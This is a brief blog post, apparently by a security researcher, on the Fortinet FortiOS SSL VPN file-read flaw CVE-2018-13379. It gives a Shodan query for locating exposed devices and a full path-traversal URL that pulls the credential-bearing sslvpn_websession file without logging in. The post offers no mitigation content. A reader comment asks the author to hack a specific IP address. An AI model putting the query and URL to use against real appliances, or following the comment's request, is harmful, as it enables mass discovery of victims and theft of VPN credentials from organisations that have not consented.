CVE-2018-13379 Fortinet FortiOS Path Traversal/Arbitrary File Read Vulnerability

Introduction

Fortinet FortiOS SSL VPN web portal allows download of system files without authentication.

Device Identification

Identify vulnerable devices from the results of Shodan query:

http.html_hash:-1454941180


Path Traversal

Access sslvpn_websession file which contain credentials using URL:

https://targetIP:port/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession


Video



Comments

  1. Can you hack Forti Client https://212.8.116.21:10443/

    ReplyDelete

Post a Comment

Popular posts from this blog

Extract / Create Cramfs File System from Ubuntu 20.04

Dump memory to file from U-Boot console using Memory Display (md) log

Firmadyne Installation & Emulation of Firmware